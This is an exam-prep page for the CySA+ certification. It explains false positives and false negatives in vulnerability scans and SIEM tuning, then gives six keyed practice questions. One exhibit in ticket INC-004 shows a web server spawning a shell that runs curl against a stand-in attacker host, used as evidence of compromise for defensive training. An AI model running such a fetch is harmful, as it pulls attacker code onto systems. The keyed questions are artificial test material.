Triage BoardGet the app

Concept · Assessment tools

False positive vs false negative

A false positive is an alert or scan finding that reports a problem that isn't there; a false negative is a real problem the tool missed. The false negative is the more dangerous of the two, because nothing prompts anyone to look. The CS0-004 exam lists true and false positives and negatives under objective 2.3 and false-positive and true-positive rates as metrics in 4.2, so they turn up in scanner output questions and in alert tuning alike.

  • Exam code CS0-004
  • Tickets here 6

The four outcomes

True positive
The tool flags something and it is real. A security information and event management (SIEM) alert on a login that really was an attacker; a scan finding for a patch that really is missing.
False positive
The tool flags something that isn't real. It costs analyst time and, repeated often enough, trains people to ignore the alert.
True negative
The tool stays quiet and nothing is wrong. Most events in a healthy network should land here.
False negative
The tool stays quiet while something is wrong. Nothing appears in the queue, so the gap shows only when another control, an audit or an incident exposes it.

Reality against the verdict

Tool alertsTool issilentReal issueTrue positiveFalse negativeNo issueFalse positiveTrue negative
Rows are what is true; columns are what the tool said. The orange cell is the one nobody sees until something else catches it.

Reading the direction of the words

Split each term in two. "Positive" or "negative" is what the tool said: it alerted, or it did not. "True" or "false" is whether the tool was right. A false negative is therefore a quiet tool that was wrong. Translating each option into "tool said / reality was" settles most wording traps in a few seconds.

In vulnerability scans

False positives come from detection by inference. A scanner that cannot log in guesses from what a service announces, and a check written for one product version can fire on a host where the vulnerable feature is installed but switched off. A credentialed scan removes much of that guessing.

False negatives come from what the scanner never reached: a laptop that was off during the scan window, a segment the scanner cannot route to, or a flaw too new for the scanner to have a check. A rescan after a fix (objective 2.3 calls it validation of remediation) is one of the places a supposedly closed finding turns out to still be open.

In SIEM and detection rules

A rule that matches an administrator's scheduled maintenance script will fire every night: a false positive. A log source that quietly stopped forwarding produces the opposite. The rule is fine, but it never sees the events, so it can never fire.

Tuning moves errors between the two columns. Tighter thresholds and broad suppressions cut false positives and raise the risk of false negatives; looser ones do the reverse. Objective 4.2 asks you to report both rates for that reason, and the automation and process improvement guide covers rule tuning as a standing task.

Which error the exam treats as worse

Asked which error is more dangerous, CySA+ wants the false negative: a missed intrusion keeps running while the queue looks calm, and the time until someone notices is what the mean time to detect metric measures. A stem that describes analysts skimming past alerts, or a queue too long to work, describes a false-positive problem instead: alert fatigue, which in time produces false negatives of its own because real alerts get dismissed with the noise.

Validate before you actTip

  • Name the exact evidence the tool used, such as a version string, a file check or a matched log field.
  • Confirm it on the asset itself or with a second, independent source.
  • Write down the verdict, the reason and who made it, so the next analyst doesn't repeat the work.

Before you close a finding as false

  • You can name the evidence the tool relied on.
  • The evidence fits this asset's operating system, software and role.
  • The IP address still belongs to the asset the ticket names.
  • Someone other than the asset owner agreed with the call.
  • The reason is written down where the next scan's reviewer will find it.

Real or noise

Keep two columns in your head while you work: what the tool reported and what actually happened.

Ticket 1 / 6

0 right

INC-001

What is a false positive in the context of vulnerability scanning?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: a false positive is a finding the scanner reports even though the vulnerability is not actually present, for example from a misread version banner.
  2. BA scan that fails to finish is a scan error, not a false finding.
  3. CAn overstated severity is a scoring or context problem; the vulnerability itself still exists.
  4. DA real vulnerability that cannot be exploited in your environment is a true positive with low risk, not a false positive.

INC-002

An organization routinely suppresses false positives but fails to schedule periodic re-verification of its vulnerability exception list. What is the primary risk associated with this practice?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: C

  1. AVulnerability exceptions do not drive SIEM blocking rules, so stale exceptions do not make the SIEM block traffic.
  2. BIAM controls do not read the vulnerability exception list, so it has no effect on privileges.
  3. CCorrect: patches, configuration changes and new software can turn an old false positive into a real exposure, and the suppression keeps it from ever alerting again.
  4. DSuppressed findings are excluded from remediation tracking, so they do not inflate mean time to remediate; the real risk is hidden exposure.

INC-003

Review the scanner output. Which entry is most likely a false positive and which requires immediate patching?

Exhibit

HostPlugin IDEvidenceCVSS
web0110432Banner reports version 2.3; actual binary is 3.1 patched7.5
db0221567Buffer overflow confirmed in running service9.8

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. AOnly web01 has a version mismatch; db02's buffer overflow was confirmed in the running service.
  2. BCorrect: web01 was flagged from a banner that misreports the patched 3.1 binary, while db02's overflow is confirmed and critical, so it needs patching now.
  3. CThis reverses the evidence: db02 is confirmed and web01 is the version-banner mismatch.
  4. Ddb02's flaw is already confirmed, so waiting for more verification only delays an urgent fix.

INC-004

A vulnerability scanner reports a critical remote code execution finding on host web-03. Review the correlated telemetry below and determine whether the finding is a true positive that requires immediate containment.

Exhibit

SourceFinding / EventTimestamp
ScannerCVE-20XX-1234 RCE on port 443, evidence: web server banner 2.4.x (vulnerable build)2024-06-01 09:15
EDRProcess: httpd (PID 1842) executed /bin/sh -c 'curl http://evil.example'2024-06-01 09:22
SIEMAlert: Outbound beacon to 203.0.113.50 after web request2024-06-01 09:23

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AThe shell spawned by httpd and the outbound beacon minutes later show exploitation already happened, so waiting 30 days for a rescan is wrong.
  2. BThe scanner's version evidence identifies a vulnerable build actually running on web-03, so dismissing the CVE ignores the data.
  3. CA web server process launching a shell to fetch from an external domain is not normal administration, especially right after the scan finding.
  4. DCorrect: the scanner finding, httpd spawning a shell and the follow-on beacon all line up, confirming active exploitation, so isolate web-03 and capture evidence.

INC-005

A vulnerability scanner reports a critical remote code execution finding on a Linux server with plugin evidence referencing a Windows-specific registry key. The server inventory confirms it runs Ubuntu 22.04 with no Windows subsystem installed. Which conclusion is most accurate?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. ACalling it low priority still accepts the finding as real, when the evidence shows it does not apply to this host.
  2. BEnvironmental scoring adjusts the severity of a real vulnerability; it does not fix evidence that points to the wrong operating system.
  3. CA Windows registry key cannot exist on an Ubuntu server with no Windows subsystem, so this is not a true positive.
  4. DCorrect: the plugin's evidence refers to Windows on a confirmed Ubuntu host, so the finding contradicts the known system state and is a false positive.

INC-006

A detection rule was tuned to suppress noisy false positives but later missed a confirmed intrusion. Which tuning change restores visibility without reintroducing excessive noise?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ALowering the threshold brings back the noise the original tuning was meant to remove.
  2. BCorrect: narrow exceptions for specific, verified benign patterns cut noise without hiding the malicious activity the broad suppression missed.
  3. CRaising the threshold everywhere suppresses even more, making more missed intrusions (false negatives) likely.
  4. DDisabling the rule removes its coverage entirely and assumes other detections will catch what it covered.

Shift tally

0 / 0

Keep the queue going on your phone

Our practice app carries CySA+ questions to your phone, on iPhone and Android.